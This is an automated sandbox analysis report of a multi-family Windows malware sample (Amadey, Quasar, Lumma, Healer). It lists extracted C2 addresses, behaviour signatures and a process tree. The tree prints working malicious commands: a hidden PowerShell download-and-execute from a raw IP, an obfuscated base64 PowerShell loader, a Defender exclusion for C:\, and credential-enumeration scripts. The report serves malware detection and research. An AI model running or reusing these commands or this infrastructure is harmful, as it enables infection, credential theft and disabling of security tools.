Overview

overview

10

Static

static

5

2025-04-02...er.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/04/2025, 02:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2025-04-02_4c530b76a01160d626f759ad0127f97b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    4c530b76a01160d626f759ad0127f97b

  • SHA1

    be994f6376d96dd75c7f486f7f851314a6a47745

  • SHA256

    e3db77358dc6fa07364f7d1ca2d61ca449d5391e59f4611d8e90a2b3f1a6b894

  • SHA512

    2a0ba9b484c530e4f0bbafae85c751398d907b26b220bd75880a9981818b0d92949a3a32e9418742290e8678552e3b5e3ded1824cf7b74eb841ed0a08401eb50

  • SSDEEP

    24576:9qDEvCTbMWu7rQYlBQcBiT6rprG8a0nu:9TvC/MTQYxsWR7a0n

Score
10/10
amadeygcleanerhealerlummaquasar092155office04bootkitcredential_accessdefense_evasiondiscoverydropperevasionexecutionexploitloaderpersistenceprivilege_escalationspywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

C2

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes
  • encryption_key

    BF72099FDBC6B48816529089CF1CF2CF86357D14

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Modded Client Startup

  • subdirectory

    SubDir

Extracted

Family

lumma

C2

https://rodformi.run/aUosoz

https://6jmetalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://qspacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://metalsyo.digital/opsa

https://anavstarx.shop/FoaJSi

https://spacedbv.world/EKdlsk

https://dmetalsyo.digital/opsa

https://-targett.top/dsANGt

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    loadergcleaner
  • Gcleaner family
    gcleaner
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • Modifies security service 2 TTPs 2 IoCs
    defense_evasion
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
    defense_evasion
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

    Using powershell.exe command.

    execution
  • Creates new service(s) 2 TTPs
    persistenceexecution
  • Downloads MZ/PE file 22 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    defense_evasion
  • Possible privilege escalation attempt 2 IoCs
    exploit
  • Stops running service(s) 4 TTPs
    defense_evasionexecution
  • Uses browser remote debugging 2 TTPs 5 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • Checks BIOS information in registry 2 TTPs 26 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

    credential_accessstealer
  • Deletes itself 1 IoCs
  • Drops startup file 4 IoCs
  • Executes dropped EXE 36 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 11 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
    discovery
  • Reads ssh keys stored on the system 2 TTPs

    Tries to access SSH used by SSH programs.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 6 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 22 IoCs
    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 14 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

    defense_evasion
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 63 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 26 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Kills process with taskkill 64 IoCs
    defense_evasion
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 3 IoCs
  • NTFS ADS 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 29 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2536
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:3968
    • C:\Users\Admin\AppData\Local\Temp\2025-04-02_4c530b76a01160d626f759ad0127f97b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-04-02_4c530b76a01160d626f759ad0127f97b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:4592
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn LXw0dmaT6to /tr "mshta C:\Users\Admin\AppData\Local\Temp\2XSAzAmhw.hta" /sc minute /mo 25 /ru "Admin" /f
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3768
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn LXw0dmaT6to /tr "mshta C:\Users\Admin\AppData\Local\Temp\2XSAzAmhw.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:4004
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\2XSAzAmhw.hta
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:956
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'V9JC0QNPC7VC5W9CLR6DCKT93OTCP2XV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:700
          • C:\Users\Admin\AppData\Local\TempV9JC0QNPC7VC5W9CLR6DCKT93OTCP2XV.EXE
            "C:\Users\Admin\AppData\Local\TempV9JC0QNPC7VC5W9CLR6DCKT93OTCP2XV.EXE"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:512
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Adds Run key to start application
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:4968
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4700
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:4712
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                    8⤵
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • Drops startup file
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: AddClipboardFormatListener
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:4764
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2112
              • C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe
                "C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe"
                6⤵
                • Executes dropped EXE
                • Enumerates connected drives
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:2704
                • C:\Windows\system32\cmd.exe
                  "cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_2616042375.txt\""
                  7⤵
                  • NTFS ADS
                  PID:4996
                • C:\Windows\system32\net.exe
                  "net" statistics workstation
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2656
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 statistics workstation
                    8⤵
                      PID:2976
                  • C:\Windows\system32\vaultcmd.exe
                    "vaultcmd" /list
                    7⤵
                      PID:3640
                    • C:\Windows\system32\tasklist.exe
                      "tasklist"
                      7⤵
                      • Enumerates processes with tasklist
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3980
                    • C:\Windows\system32\tasklist.exe
                      "tasklist" /FO CSV /NH
                      7⤵
                      • Enumerates processes with tasklist
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4432
                    • C:\Windows\system32\cmdkey.exe
                      "cmdkey" /list
                      7⤵
                        PID:1644
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1876
                        • C:\Windows\system32\cmdkey.exe
                          "C:\Windows\system32\cmdkey.exe" /list
                          8⤵
                            PID:456
                        • C:\Windows\system32\tasklist.exe
                          "tasklist"
                          7⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2976
                        • C:\Windows\system32\tasklist.exe
                          "tasklist"
                          7⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:116
                        • C:\Windows\system32\certutil.exe
                          "certutil" -store My
                          7⤵
                            PID:4480
                          • C:\Windows\system32\certutil.exe
                            "certutil" -store -user My
                            7⤵
                              PID:3980
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "powershell" -Command "Get-VpnConnection | ConvertTo-Json"
                              7⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4620
                            • C:\Windows\system32\tasklist.exe
                              "tasklist"
                              7⤵
                              • Enumerates processes with tasklist
                              • Suspicious use of AdjustPrivilegeToken
                              PID:64
                            • C:\Windows\system32\tasklist.exe
                              "tasklist"
                              7⤵
                              • Enumerates processes with tasklist
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3572
                            • C:\Windows\system32\tasklist.exe
                              "tasklist"
                              7⤵
                              • Enumerates processes with tasklist
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1996
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "
                              7⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Hide Artifacts: Ignore Process Interrupts
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4444
                              • C:\Windows\System32\Conhost.exe
                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                8⤵
                                  PID:1168
                              • C:\Windows\system32\tasklist.exe
                                "tasklist"
                                7⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:816
                              • C:\Windows\system32\cmdkey.exe
                                "cmdkey" /list
                                7⤵
                                  PID:4928
                                • C:\Windows\system32\tasklist.exe
                                  "tasklist"
                                  7⤵
                                  • Enumerates processes with tasklist
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3572
                                • C:\Windows\system32\cmdkey.exe
                                  "cmdkey" /list:TERMSRV/69.48.201.74
                                  7⤵
                                    PID:3224
                                  • C:\Windows\system32\tasklist.exe
                                    "tasklist"
                                    7⤵
                                    • Enumerates processes with tasklist
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3524
                                  • C:\Windows\system32\tasklist.exe
                                    "tasklist"
                                    7⤵
                                    • Enumerates processes with tasklist
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2392
                                  • C:\Windows\system32\taskkill.exe
                                    "taskkill" /IM chrome.exe
                                    7⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3088
                                  • C:\Windows\system32\taskkill.exe
                                    "taskkill" /IM msedge.exe
                                    7⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:700
